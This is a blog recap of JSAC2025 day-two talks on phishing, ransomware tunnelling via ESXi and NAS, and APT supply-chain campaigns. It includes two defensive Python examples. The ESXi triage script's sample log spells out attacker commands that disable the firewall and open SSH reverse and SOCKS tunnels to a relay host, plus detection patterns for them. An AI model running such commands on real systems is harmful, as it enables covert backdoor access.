JSAC2025 -Day 2-
Continuing from the previous blog article, this entry introduces the presentations on the 2nd day of JSAC2025.
Observation of phishing criminal groups related to illegal money transfers and Mizuho Bank’s countermeasures -Fighting against phishing site malware ‘KeepSpy’-
Speaker: Tsukasa Takeuchi, Takuya Endo, Hiroyuki Yako (Mizuho Financial Group)
Slides (English)
Tsukasa, Takuya, and Hiroyuki presented Mizuho’s efforts to address phishing attacks, including the analysis of exploited malware and the criminal groups behind them, as well as internal organizational collaboration to counter such threats.
They first discussed the current state of damage from phishing attacks in Japan and the costs of responding to such incidents, and then emphasized the importance of containing phishing as a criminal activity. They then detailed the characteristics of the phishing sites they have identified and classified their TTPs, focusing particularly on the groups that conduct smishing and their attack methods.
In addition, they explained the details of KeepSpy, Android malware that spreads links to phishing sites via smishing. Their analysis revealed the malware's functionality and how it executes commands received from its C2 server to distribute phishing site URLs via SMS. The speakers said that identifying the functionality related to phishing attacks and profiling the criminal groups would enable them to detect and swiftly take down phishing sites.
They also discussed how CT logs can be used for early detection, based on statistics on targeted brands and their analysis of the server certificates of phishing sites. Furthermore, they shared their efforts towards automation, describing the actual workflow as well as the collaborative process within Mizuho for implementation and future improvements.
In conclusion, the speakers shared their future plans, focusing on expanding and optimizing the early detection systems. They also emphasized that not only information sharing but also collaborative protection strategies with other organizations are necessary to combat phishing attacks.

Rapidly Changing Trends in Phishing -Sharing real-time phishing site detection systems-
Speaker: Ryosuke Yoshimura, Tomoya Sano (LAC)
Slides (English)
Ryosuke and Tomoya presented a system designed to detect phishing sites in real time, built to address the current situation surrounding phishing attacks.
They first explained the growing trend of phishing, citing the increasing number of credit card information thefts and unauthorized Internet banking transfers over the years. They also highlighted that phishing attacks tend to exploit major brands or events that attract significant public attention, leading to rapid changes in attack trends. Additionally, they pointed out that phishing methods are rapidly evolving along with technical changes such as free SSL certificate services and the adoption of DMARC.
The speakers introduced a system that detects phishing sites in real time to address this situation and explained its details. The system uses its own extraction logic to identify potential phishing domains at an early stage. The speakers provided actual case studies in which they identified and analyzed phishing sites distributing malware, and explained the methods used in the attacks.
In conclusion, the speakers discussed their future challenges. Acknowledging that the system's extraction logic, because it relies on certificate data, sometimes detects phishing sites before they are fully established, they expressed their intention to continue developing the system to address this issue.
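Both the Mizuho and LAC talks describe using certificate data to spot phishing domains early. The following is an added example, not code from either speaker's system: it scans constructed CT log entries (a simplified JSON shape, not real CT data) for domains that contain or closely resemble a watched brand, and returns them as a watchlist with the certificate's issuance time. The brand names, legitimate domains and sample entries are all placeholders, and the registrable-domain logic is deliberately naive.

```python
import json
import re
from difflib import SequenceMatcher

# Brands to watch, mapped to their legitimate registrable domains (constructed placeholders).
BRANDS = {"examplebank": {"examplebank.example"}, "exampay": {"exampay.example"}}

# Constructed CT log entries in a simplified JSON shape; not real certificate data.
SAMPLE_CT_ENTRIES = [
    '{"domains": ["www.examplebank.example"], "not_before": "2025-01-10T00:00:00Z"}',
    '{"domains": ["examplebank-login.xyz", "mail.examplebank-login.xyz"], "not_before": "2025-01-10T01:00:00Z"}',
    '{"domains": ["exarnplebank.top"], "not_before": "2025-01-10T01:05:00Z"}',
    '{"domains": ["secure.exampay.example.attacker.invalid"], "not_before": "2025-01-10T01:10:00Z"}',
    '{"domains": ["weather.example.net"], "not_before": "2025-01-10T02:00:00Z"}',
]

def registrable(domain):
    """Naive registrable domain: the last two labels (a real system would use a public-suffix list)."""
    parts = domain.lower().lstrip("*.").split(".")
    return ".".join(parts[-2:])

def brand_hits(domain, threshold=0.85):
    """Return (brand, reason) if the domain looks like it impersonates a watched brand, else None."""
    d = domain.lower().lstrip("*.")
    for brand, legit_domains in BRANDS.items():
        if registrable(d) in legit_domains:
            continue  # the brand's own certificate, not a candidate
        if brand in d:
            return brand, "brand keyword inside a non-brand domain"
        # Near-miss labels catch lookalikes such as 'rn' standing in for 'm'.
        for label in re.split(r"[.-]", d):
            if len(label) >= 5 and SequenceMatcher(None, label, brand).ratio() >= threshold:
                return brand, f"label '{label}' resembles '{brand}'"
    return None

def watchlist_from_ct(entries):
    """Scan CT entries and return candidates with brand, reason and certificate issuance time.

    A hit only means a certificate was issued; the site may not be live yet, so candidates
    go on a watchlist for later confirmation rather than straight to takedown.
    """
    candidates = []
    for raw in entries:
        entry = json.loads(raw)
        for domain in entry["domains"]:
            hit = brand_hits(domain)
            if hit:
                candidates.append({"domain": domain, "brand": hit[0], "reason": hit[1],
                                   "not_before": entry["not_before"]})
    return candidates
```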

Analysis of Two Phishers: Like a doppelganger
Speaker: Masaomi Masumoto (NTT Communications)
Slides (English)
Masaomi presented the results and insights from analyzing two Phishing-as-a-Service (PhaaS) phishing kits. He also shared how detection rules can be created using Indicators of Kit (IOK) and how they can be effectively used.
He first focused on the two PhaaS services, highlighting the similarities between the promotional videos shared within the attacker community and the timing of community posts and other activities. He also pointed out that both phishing kits targeted Japan and used the same management panel tools. After that, he discussed the files and features included in both phishing kits. The Case 1 phishing kit contained multiple JavaScript files as well as distinct data theft and cloaking processes. While the Case 2 phishing kit is similar in structure and processes, new features such as IP address counting and data addition were confirmed. He pointed out that the IP address-related feature was also identified in the phishing kit used by the attack group Chenlun, and by comparing these phishing kits he discussed the similarities in code, processing methods, and execution.
Furthermore, the speaker explained how phishing sites can be easily established using phishing kits. Docker can be used to efficiently set up the required environment, and domains and target brands can be easily configured through scripts. Based on these findings, he discussed how to create detection rules using IOK and expressed his hope that the presentation would contribute to further understanding of phishing attacks.

Active Monitoring and Response to User Credential Leaks
Speaker: Yuji Ino, Mitsuki Yoshikawa (Recruit Technologies)
*The presentation is only available at the conference.
Ransomware’s Secret Tunnel: How Ransomware Groups Hijack ESXi and NAS for Covert Operations
Speaker: Zhongyuan Hau, Ren Jie Yow (Sygnia)
Slides (English)
Zhongyuan and Ren Jie presented their findings on a new attack technique by ransomware groups to bypass security products’ detection. With a detailed demonstration, they explained how attackers exploit network configurations and credentials of ESXi and NAS to avoid detection through tunneling.
First, they pointed out that although NAS and ESXi are frequent targets of ransomware attacks due to their critical importance within systems, they are often under-monitored by EDR and can have long operational lifespans, making them more likely to be exploited for backdoor access. In one case involving a NAS device, attackers used stolen credentials to log in to the web-based NAS management interface, activated SSH, and used the device as a backdoor. Similarly, in another case involving ESXi, after gaining unauthorized access, attackers activated SSH, disabled the firewall, and used SSH port forwarding to further exploit the system.
Additionally, the speakers discussed the forensic investigation process for such attacks. Since these attacks often avoid detection by EDR, investigators need to focus on reviewing command execution histories on the affected devices. For NAS devices, it is essential to closely review the logs of SSH authentication, access, devices, and command execution, and to check timestamps for signs of backdoors. For ESXi investigations, it is important to focus on the ESXi logs, application logs, and SSH history. The speakers introduced the specific attacker actions that leave traces, as well as the files in which such traces can be found.
Finally, they emphasized the importance of monitoring NAS and ESXi devices thoroughly and the value of storing system logs to protect against such attacks. They concluded by reiterating the danger posed by the stealth and persistence of these attacks and asked organizations to implement robust countermeasures to protect their systems.
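The speakers' advice to review command execution history on ESXi and NAS devices can be turned into a small triage script. The following is an added example, not tooling from the talk or from Sygnia: it parses constructed command-history lines in a simplified "timestamp shell[pid]: [user]: command" format (not taken from a real device), flags the three behaviours described above (SSH enabled, firewall disabled, SSH port forwarding), and clusters them so that a burst of such commands stands out as a single event. The sample commands and addresses are illustrative.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of a shell command history in a simplified format
# ("<timestamp> shell[<pid>]: [<user>]: <command>"); not from a real ESXi or NAS host.
SAMPLE_SHELL_LOG = """\
2025-01-12T02:14:05Z shell[1001]: [root]: vim-cmd hostsvc/enable_ssh
2025-01-12T02:14:09Z shell[1001]: [root]: esxcli network firewall set --enabled false
2025-01-12T02:15:30Z shell[1001]: [root]: ssh -f -N -R 2222:127.0.0.1:22 relay@203.0.113.10
2025-01-12T09:00:00Z shell[1203]: [root]: esxcli storage filesystem list
2025-01-13T02:20:11Z shell[1310]: [root]: ssh -D 1080 -N relay@203.0.113.10
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# One rule per behaviour described in the talk: SSH enabled, firewall disabled,
# and SSH port forwarding (-R reverse, -L local, -D dynamic/SOCKS).
RULES = [
    ("ssh_service_enabled", re.compile(r"hostsvc/(enable|start)_ssh")),
    ("firewall_disabled", re.compile(r"esxcli network firewall set .*--enabled\s+false")),
    ("ssh_port_forwarding", re.compile(r"\bssh\b.*\s-[RLD]\s*\S+")),
]

def parse_line(line):
    """Parse one history line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return {"ts": ts, "user": m["user"], "cmd": m["cmd"]}

def find_tunnel_indicators(log_text):
    """Return the entries that trigger a rule, tagged with the rule name, in time order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name, pattern in RULES:
            if pattern.search(entry["cmd"]):
                findings.append({**entry, "rule": name})
    return sorted(findings, key=lambda f: f["ts"])

def tunnel_sequences(findings, window_minutes=30):
    """Cluster findings that follow each other within window_minutes into one event."""
    groups = []
    for f in findings:
        if groups and f["ts"] - groups[-1]["end"] <= timedelta(minutes=window_minutes):
            groups[-1]["end"] = f["ts"]
            groups[-1]["rules"].add(f["rule"])
        else:
            groups.append({"start": f["ts"], "end": f["ts"], "rules": {f["rule"]}})
    return groups
```

A cluster that contains all three rules within a short window is the pattern worth escalating first; an isolated port-forwarding command still deserves a look, but may be legitimate administration.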

From Service Providers to Customers: Earth Ammit Tailored Cyber Assault on Target’s Supply Chain
Speaker: Pierre Lee, Philip Chen, Vickie Su (Trend Micro)
*The presentation is only available at the conference.
China-aligned PlushDaemon APT compromises supply chain of Korean VPN
Speaker: Facundo Munoz (ESET)
Slides (English)
Facundo presented the activities of the PlushDaemon attack group and the details of its attacks. Active since 2019, the group is known for its distinctive attack methods, including supply chain compromises, which the speaker discussed in detail.
In incidents believed to be linked to PlushDaemon, attackers compromised the legitimate website of a VPN solution provider and used it to distribute Trojan malware disguised as software setup files. These downloaded files included suspicious DLL files in addition to the legitimate ones, which allowed the SlowStepper backdoor to be installed along with the regular software. The speaker noted that this TTP shows similarities with the backdoor NSPX30 used by the attack actor Blackwood, which he presented at JSAC the previous year. He also shared his analysis of SlowStepper, detailing its various versions, its variety of toolkits, and its functionality.
Furthermore, he discussed other AitM attack cases by PlushDaemon, including incidents where the downloader LittleDaemon was used. Noting that a number of applications made in China were exploited in these attacks, he suggested the possibility that attackers used DNS poisoning to redirect software update requests to malicious servers.
In conclusion, the speaker underscored the complexity, multi-functional nature, and resourcefulness of PlushDaemon's attack methods, warning that their willingness to engage in supply chain attacks despite the high risk of their tools being detected makes them a serious threat.

Operation AkaiRyu: MirrorFace invites Europe to EXPO 2025 and revives ANEL backdoor
Speaker: Dominik Breitenbacher (ESET)
Slides (English)
Dominik presented his analysis of Operation AkaiRyu, an attack campaign conducted by the APT group MirrorFace.
Operation AkaiRyu has been targeting diplomatic institutions in Central Europe since August 2024. In the initial penetration phase, the attackers send the targets emails related to the 2025 World Expo in Japan. If the target replies, the second email includes a link to a file-sharing service hosting a suspicious file. When the targets download and unzip the ZIP file, they find a .lnk file; executing it deploys and runs multiple files. The speaker found that this process ultimately leads to the decryption and execution of the ANEL malware.
The speaker further explained the post-compromise activities, noting that MirrorFace selects specific tools based on the compromised device. For example, on a project coordinator's device, the goal was to steal personal information, while on an employee's device, the attackers aimed to gain access to the system and move laterally within the network. The speaker also provided details on the deployed tools, including the commands and versions of ANEL, as well as the functionality of NOOPDOOR, a loader deployed in the later stages of the attack, and the customized AsyncRAT.
Lastly, the speaker discussed the potential connection between APT10 and MirrorFace, highlighting similarities in their targets. He pointed out that MirrorFace’s use of the ANEL malware, which was previously used by APT10, suggests that they may be a subgroup of APT10.

Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts
Speaker: Yusuke Niwa, Satoshi Kamekawa, Shuhei Sasada (Itochu Cyber & Intelligence)
Slides (English)
Satoshi and Yusuke presented their analysis of MirrorFace's attack campaign that leveraged Windows Sandbox. They clarified the attack methods from the observed signs of compromise, and based on the results of their investigation, they shared effective countermeasures and forensic techniques.
First, the speakers described the structure of Windows Sandbox and then explained how the campaign abused WSB files. They also noted that recent Windows updates introduced new CLI commands for Windows Sandbox that make it possible to run the sandbox without executing a WSB file, pointing out that this potentially reduces the traceability of attacks if abused.
Based on these findings, the speakers suggested that separate responses are needed on both the host side and the sandbox side, and explained in detail how to conduct investigation and monitoring for each. On the host side, it is necessary to monitor distinctive processes, memory usage, and event logs, and the speakers shared specific process names to be prioritized for monitoring. On the sandbox side, they explained that vmmem can be used to detect traces of malicious tools and that YARA rules can also be employed for detection. They also shared useful artifacts on both the host and sandbox sides for forensic investigations and discussed effective countermeasures against the attack.
Based on the observed cases, the speakers emphasized that when monitoring with EDR or similar tools is challenging, it is crucial to implement proactive measures such as strengthened monitoring and comprehensive investigations to minimize risks. They also highlighted the potential risk that system updates designed to improve user convenience could unintentionally benefit attackers.

In Closing
In this article, I introduced the presentations on the second day of JSAC 2025. The next entry will feature the Workshops and Lightning Talks.